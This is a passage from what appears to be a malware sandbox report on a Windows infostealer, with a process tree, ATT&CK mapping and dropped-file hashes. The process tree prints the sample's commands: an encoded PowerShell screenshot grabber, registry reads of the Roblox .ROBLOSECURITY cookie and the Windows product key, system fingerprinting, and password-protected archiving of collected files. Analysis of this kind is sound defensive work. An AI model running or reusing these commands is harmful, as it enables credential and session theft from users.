      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:948
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1anxjfne\1anxjfne.cmdline"
        5⤵
        
        PID:3708
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES11CE.tmp" "c:\Users\Admin\AppData\Local\Temp\1anxjfne\CSCB728AB7AE0FA4387979BCFB01E9C3CE1.TMP"
        6⤵
        
        PID:4408
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3612
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3800
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3020
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2104
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4308
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2024
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3560
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3140
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:1908
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3800
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:5020
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:948
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:1076
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1144
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI19042\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\J3CZ7.zip" *"
    3⤵
    PID:1088
  - - C:\Users\Admin\AppData\Local\Temp\_MEI19042\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI19042\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\J3CZ7.zip" *
      4⤵
      Executes dropped EXE
      PID:2124
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:3352
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1136
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:2212
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:4684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:2104
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:1440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:3708
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1892
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:1352
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:4636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:4976
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1160

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\_MEI19042\VCRUNTIME140.dll

Filesize
117KB

MD5
862f820c3251e4ca6fc0ac00e4092239

SHA1
ef96d84b253041b090c243594f90938e9a487a9a

SHA256
36585912e5eaf83ba9fea0631534f690ccdc2d7ba91537166fe53e56c221e153

SHA512
2f8a0f11bccc3a8cb99637deeda0158240df0885a230f38bb7f21257c659f05646c6b61e993f87e0877f6ba06b347ddd1fc45d5c44bc4e309ef75ed882b82e4e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19042\_bz2.pyd

Filesize
49KB

MD5
e1b31198135e45800ed416bd05f8362e

SHA1
3f5114446e69f4334fa8cda9cda5a6081bca29ed

SHA256
43f812a27af7e3c6876db1005e0f4fb04db6af83a389e5f00b3f25a66f26eb80

SHA512
6709c58592e89905263894a99dc1d6aafff96ace930bb35abff1270a936c04d3b5f51a70fb5ed03a6449b28cad70551f3dccfdd59f9012b82c060e0668d31733

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19042\_ctypes.pyd

Filesize
63KB

MD5
b6262f9fbdca0fe77e96a9eed25e312f

SHA1
6bfb59be5185ceaca311f7d9ef750a12b971cbd7

SHA256
1c0f9c3bdc53c2b24d5480858377883a002eb2ebb57769d30649868bfb191998

SHA512
768321758fc78e398a1b60d9d0ac6b7dfd7fd429ef138845461389aaa8e74468e4bc337c1db829ba811cb58cc48cfff5c8de325de949dde6d89470342b2c8ce8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19042\_decimal.pyd

Filesize
119KB

MD5
9cfb6d9624033002bc19435bae7ff838

SHA1
d5eecc3778de943873b33c83432323e2b7c2e5c2

SHA256
41b0b60fe2aa2b63c93d3ce9ab69247d440738edb4805f18db3d1daa6bb3ebff

SHA512
dd6d7631a54cbd4abd58b0c5a8cb5a10a468e87019122554467fd1d0669b9a270650928d9de94a7ec059d4acebf39fd1cfcea482fc5b3688e7924aaf1369cc64

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19042\api-ms-win-core-console-l1-1-0.dll

Filesize
21KB

MD5
9f746f4f7d845f063fea3c37dcebc27c

SHA1
24d00523770127a5705fcc2a165731723df36312

SHA256
88ace577a9c51061cb7d1a36babbbefa48212fadc838ffde98fdfff60de18386

SHA512
306952418b095e5cf139372a7e684062d05b2209e41d74798a20d7819efeb41d9a53dc864cb62cc927a98df45f7365f32b72ec9b17ba1aee63e2bf4e1d61a6e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19042\api-ms-win-core-datetime-l1-1-0.dll

Filesize
21KB

MD5
8f8eb9cb9e78e3a611bc8acaec4399cb

SHA1
237eee6e6e0705c4be7b0ef716b6a4136bf4e8a8

SHA256
1bd81dfd19204b44662510d9054852fb77c9f25c1088d647881c9b976cc16818

SHA512
5b10404cdc29e9fc612a0111b0b22f41d78e9a694631f48f186bdde940c477c88f202377e887b05d914108b9be531e6790f8f56e6f03273ab964209d83a60596

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19042\api-ms-win-core-debug-l1-1-0.dll

Filesize
21KB

MD5
226a5983ae2cbbf0c1bda85d65948abc

SHA1
d0f131dcba0f0717c5dea4a9ca7f2e2ecf0ad1c3

SHA256
591358eb4d1531e9563ee0813e4301c552ce364c912ce684d16576eabf195dc3

SHA512
a1e6671091bd5b2f83bfaa8fcf47093026e354563f84559bd2b57d6e9fa1671eea27b4ed8493e9fdf4bde814074dc669de047b4272b2d14b4f928d25c4be819d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19042\api-ms-win-core-errorhandling-l1-1-0.dll

Filesize
21KB

MD5
c2f8c03ecce9941492bfbe4b82f7d2d5

SHA1
909c66c6dfea5e0c74d3892d980918251bb08632

SHA256
d56ce7b1cd76108ad6c137326ec694a14c99d48c3d7b0ace8c3ff4d9bcee3ce8

SHA512
7c6c85e390bbe903265574e0e7a074da2ce30d9376d7a91a121a3e0b1a8b0fffd5579f404d91836525d4400d2760cb74c9cb448f8c5ae9713385329612b074cf

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19042\api-ms-win-core-fibers-l1-1-0.dll

Filesize
21KB

MD5
b5e2760c5a46dbeb8ae18c75f335707e

SHA1
e71db44fc0e0c125de90a9a87ccb1461e72a9030

SHA256
91d249d7bc0e38ef6bcb17158b1fdc6dd8888dc086615c9b8b750b87e52a5fb3

SHA512
c3400772d501c5356f873d96b95dc33428a34b6fcaad83234b6782b5f4bf087121e4fd84885b1abab202066da98eb424f93dd2eed19a0e2a9f6ff4a5cfd1e4f3

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19042\api-ms-win-core-fibers-l1-1-1.dll

Filesize
21KB

MD5
050a30a687e7a2fa6f086a0db89aa131

SHA1
1484322caaf0d71cbb873a2b87bdd8d456da1a3b

SHA256
fc9d86cec621383eab636ebc87ddd3f5c19a3cb2a33d97be112c051d0b275429

SHA512
07a15aa3b0830f857b9b9ffeb57b6593ae40847a146c5041d38be9ce3410f58caa091a7d5671cc1bc7285b51d4547e3004cf0e634ae51fe3da0051e54d8759e1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19042\api-ms-win-core-file-l1-1-0.dll

Filesize
25KB

MD5
9f45a47ebfd9d0629f4935764243dd5a

SHA1
86a4a0ea205e31fb73f3bfcce24945bd6bea06c7

SHA256
1ca895aba4e7435563a6b43e85eba67a0f8c74aa6a6a94d0fc48fa35535e2585

SHA512
8c1cdcad557bff1685a633d181fcf14ec512d322caeaeb9c937da8794c74694fe93528fc9578cb75098f50a2489ed4a5dedf8c8c2ac93eeb9c8f50e3dd690d5f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19042\api-ms-win-core-file-l1-2-0.dll

Filesize
21KB

MD5
cc228ff8d86b608e73026b1e9960b2f8

SHA1
cef0705aee1e8702589524879a49e859505d6fe0

SHA256
4cadbc0c39da7c6722206fdcebd670abe5b8d261e7b041dd94f9397a89d1990d

SHA512
17abd9e0ec20b7eb686e3c0f41b043d0742ab7f9501a423b2d2922d44af660379792d1cc6221effbd7e856575d5babf72657ae9127c87cc5cf678bd2ceb1228f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19042\api-ms-win-core-file-l2-1-0.dll

Filesize
21KB

MD5
e368a236f5676a3da44e76870cd691c9

SHA1
e4f1d2c6f714a47f0dc29021855c632ef98b0a74

SHA256
93c624b366ba16c643fc8933070a26f03b073ad0cf7f80173266d67536c61989

SHA512
f5126498a8b65ab20afaaf6b0f179ab5286810384d44638c35f3779f37e288a51c28bed3c3f8125d51feb2a0909329f3b21273cb33b3c30728b87318480a9ef8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19042\api-ms-win-core-handle-l1-1-0.dll

Filesize
21KB

MD5
416aa8314222db6cbb3760856be13d46

SHA1
5f28fe2d565378c033ef8eea874bc38f4b205327

SHA256
39095f59c41d76ec81bb2723d646fde4c148e7cc3402f4980d2ade95cb9c84f9

SHA512
b16ed31dc3343caea47c771326810c040a082e0ab65d9ae69946498ceb6ae0dee0a570dbcd88090668a100b952c1ff88bade148811b913c90931aa0e657cd808

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19042\api-ms-win-core-heap-l1-1-0.dll

Filesize
21KB

MD5
344a09b4be069f86356a89482c156647

SHA1
2506ffeb157cb531195dd04d11d07c16e4429530

SHA256
8f105771b236dbcb859de271f0a6822ce1cb79c36988dd42c9e3f6f55c5f7eb9

SHA512
4c1e616443576dc83200a4f98d122065926f23212b6647b601470806151ff15ea44996364674821afec492b29ba868f188a9d6119b1e1d378a268f1584ca5b29

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19042\api-ms-win-core-interlocked-l1-1-0.dll

Filesize
21KB

MD5
86023497fa48ca2c7705d3f90b76ebc5

SHA1
835215d7954e57d33d9b34d8850e8dc82f6d09e8

SHA256
53b25e753ca785bf8b695d89dde5818a318890211dc992a89146f16658f0b606

SHA512
8f8370f4c0b27779d18529164fa40cbfddafa81a4300d9273713b13428d0367d50583271ea388d43c1a96fed5893448cd14711d5312da9dfa09b9893df333186

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19042\api-ms-win-core-kernel32-legacy-l1-1-1.dll

Filesize
21KB

MD5
0c1cc0a54d4b38885e1b250b40a34a84

SHA1
24400f712bbe1dd260ed407d1eb24c35dcb2ecac

SHA256
a9b13a1cd1b8c19b0c6b4afcd5bb0dd29c0e2288231ac9e6db8510094ce68ba6

SHA512
71674e7ed8650cac26b6f11a05bfc12bd7332588d21cf81d827c1d22df5730a13c1e6b3ba797573bb05b3138f8d46091402e63c059650c7e33208d50973dde39

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19042\api-ms-win-core-libraryloader-l1-1-0.dll

Filesize
21KB

MD5
5fbcb20d99e463259b4f15429010b9cd

SHA1
b16770f8bb53dc2bafcb309824d6fa7b57044d8a

SHA256
7f39ba298b41e4963047341288cab36b6a241835ee11ba4ad70f44dacd40906c

SHA512
7ba1ac34b3ecfbfb8252f5875be381d8ef823b50dfe0e070222175ee51191f5ee6d541eeedd1445ed603a23d200ce9ce15914c8ed3fafe7e7f3591f51f896c58

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19042\api-ms-win-core-localization-l1-2-0.dll

Filesize
21KB

MD5
5241df2e95e31e73ccfd6357ad309df0

SHA1
2644cc5e86dfad1ad2140181ab2ca79725f95411

SHA256
6ee44dd0d8510dc024c9f7c79b1b9fa88c987b26b6beb6653ddd11751c34e5dc

SHA512
52cccd1dd237e764e34996c0c5f7a759a7f0eff29b61befeaf96a16d80df2ba9ee2c3615f875153198a145d68f275aea6d02187e6eee5a129e3e2ab81aaceb16

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19042\api-ms-win-core-memory-l1-1-0.dll

Filesize
21KB

MD5
8d285430e8bda6d5c9b683579adcb180

SHA1
619dbbcff06c659e3fc48f03917a4dadbfc1c275

SHA256
0512a35316ec9180437f86696a84c5c06a7e4e82e050055a656e5bf9fca206f9

SHA512
38405dd85dd62f843abb55acea1b64d7d63bb601445bf1b32078cde5bbef4861dd99f26659281fe2aea86f58cfb1725d8c63d91fb539dcbf5d98cdbe783337fc

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19042\api-ms-win-core-namedpipe-l1-1-0.dll

Filesize
21KB

MD5
4a28ca64f44b91f43945ee3971e0996a

SHA1
45b3d8584c58e8d6ae507fdbd772feeb1886c8b0

SHA256
c05f1fffe3b5a2738ea54ce9485cca026fb9635f982626fba1e1dcc531897273

SHA512
862a0428f08d447cd1ee0431969e0fbcb182f4c46418c26d26fa33e586e686d9c093c1ca5781f544ce9276195ce973850719636e39e465f059607f455ecfdd93

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19042\api-ms-win-core-processenvironment-l1-1-0.dll

Filesize
21KB

MD5
7fd4a71085783ccfe9c289c07bcf9b04

SHA1
bb6ffdb5c069dbba06998dc877d24f72dad6298d

SHA256
c4eca98c3c67b6395d5b005b00ac1eb0318b86b23aa71035a44c2b1602befba9

SHA512
a96c5b90b8384b239be111d90caa3b947651ad73382ab9e5dbe4a4b6ad30921876545331d37c8d5a8f669e39d71bf60983c4ba39c479e23015c2f7579c5e55cd

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19042\api-ms-win-core-processthreads-l1-1-0.dll

Filesize
21KB

MD5
c123f2c161884fbff4f00ef1e1391266

SHA1
7db3055da53916bea2b85b159491a0772fb620ce

SHA256
5ccb89e93d67bc3288d4e84649c5346e66e15e3d7cd65d989daf3f4cb584be9a

SHA512
dac5616320b9052254b5687959e67126c4a938e79173d8245675a9651674384c36cc856f996ef88ae621ec67afc6616626657585d92bb5d14602a7cc9fc0f669

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19042\api-ms-win-core-processthreads-l1-1-1.dll

Filesize
21KB

MD5
385f562bdc391ccd4f81aca3719f3236

SHA1
f6633e1dac227ba3cd14d004748ef0c1c4135e67

SHA256
4ad565a8ba3ef0ea8ab87221ad11f83ee0bc844ce236607958406663b407333e

SHA512
b72ed1a02d4a02791ca5490b35f7e2cb6cb988e4899eda78134a34fb28964ea573d3289b69d5db1aac2289d1f24fd0a432b8187f7ae8147656d38691ae923f27

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19042\api-ms-win-core-profile-l1-1-0.dll

Filesize
21KB

MD5
7a629293eeb0bca5f9bdee8ade477c54

SHA1
a25bf8bac4fbfd9216ea827e71344ba07b1d463b

SHA256
7809160932f44e59b021699f5bc68799eb7293ee1fa926d6fcca3c3445302e61

SHA512
1c58c547d1fe9b54ddf07e5407edaf3375c6425ca357aa81d09c76a001376c43487476a6f18c891065ab99680501b0f43a16a10ed8e0d5e87b9a9542098f45fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19042\api-ms-win-core-rtlsupport-l1-1-0.dll

Filesize
21KB

MD5
3c5c7a3130b075b2def5c413c127173f

SHA1
f3d2b8ad93f3dc99c8410d34c871aec56c52e317

SHA256
9dc1e91e71c7c054854bd1487cb4e6946d82c9f463430f1c4e8d1471005172b1

SHA512
46a52631e3dd49b0ae10afbdf50a08d6d6575f3093b3921b2fa744704e2d317f8b10a6d48ad7f922a7843731782521773032a6cc04833b00bd85e404c168ffe4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19042\api-ms-win-core-string-l1-1-0.dll

Filesize
21KB

MD5
28005b20fbef6e1db10912d0fdd6471c

SHA1
47b83697677e08e4ebcff6fc41eca7ece120cc17

SHA256
60fc31d2a0c634412f529dba76af3b9bf991352877c6dae528186d3935704cfd

SHA512
45d6f860d7f7aefaa7a0a3b4b21b5c3234f442e39d6259e0a9e2083890533c275f07ddda93fddc7445928a55475b83c63253d3b08e41e5576f9029b205dfb36a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19042\api-ms-win-core-synch-l1-1-0.dll

Filesize
21KB

MD5
436ea0237ed040513ec887046418faaa

SHA1
44bafbbdb1b97d86505e16b8a5fcb42b2b771f91

SHA256
3a72b4f29f39a265d32ad12f0ce15dbf60129c840e10d84d427829ede45e78ad

SHA512
9f0dbfb538c05383ae9abfe95e55740530ecc12c1890d8862deacbc84212be0740d82afc9e81d529125221e00b2286cae0d4b3ca8dd3a6c57774d59f37933692

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19042\api-ms-win-core-synch-l1-2-0.dll

Filesize
21KB

MD5
8f107a7bc018227b181a0e7e76e9ca39

SHA1
ef57e24f29d2b1deeacefd82171873b971a3f606

SHA256
efc1e4460984a73cf47a3def033af1c8f3b1dbc1a56cd27781d3aacf3e3330cb

SHA512
d8d8250aaf93fa99e9d1e4286b32579de0029c83867a787c0a765505a0f8cbd2dd076bb324509d5c4867423bc7dc8f00c8b8458e08e8cbfa8dd731d03dd1ae3f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19042\api-ms-win-core-sysinfo-l1-1-0.dll

Filesize
21KB

MD5
b65bf5ef316880fd8d21e1b34eb5c8a9

SHA1
3ab4674cb5c76e261fe042d6d0da8a20bfcbcbae

SHA256
b203d862ddef1dd62bf623fc866c7f7a9c317c1c2ae30d1f52cb41f955b5698e

SHA512
4af3b0ef9a813ce1a93a35dd6869817910ae4b628f374477f60ea1831d2cc1aae7908262672e11954a4953bdff22bcc5fe23b4a736788e8e5ef4f8ac30eb24f8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19042\api-ms-win-core-sysinfo-l1-2-0.dll

Filesize
21KB

MD5
fc9fc5f308ffc2d2d71814df8e2ae107

SHA1
24d7477f2a7dc2610eb701ed683108cd57eca966

SHA256
2703635d835396afd0f138d7c73751afe7e33a24f4225d08c1690b0a371932c0

SHA512
490fa6dc846e11c94cfe2f80a781c1bd1943cddd861d8907de8f05d9dc7a6364a777c6988c58059e435ac7e5d523218a597b2e9c69c9c34c50d82cac4400fe01

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19042\api-ms-win-core-timezone-l1-1-0.dll

Filesize
21KB

MD5
43d8d2fb8801c5bd90d9482ddf3ea356

SHA1
d582b55cd58531e726141c63ba9910ff185d72e0

SHA256
33f4fddc181066fce06b2227bded813f95e94ed1f3d785e982c6b6b56c510c57

SHA512
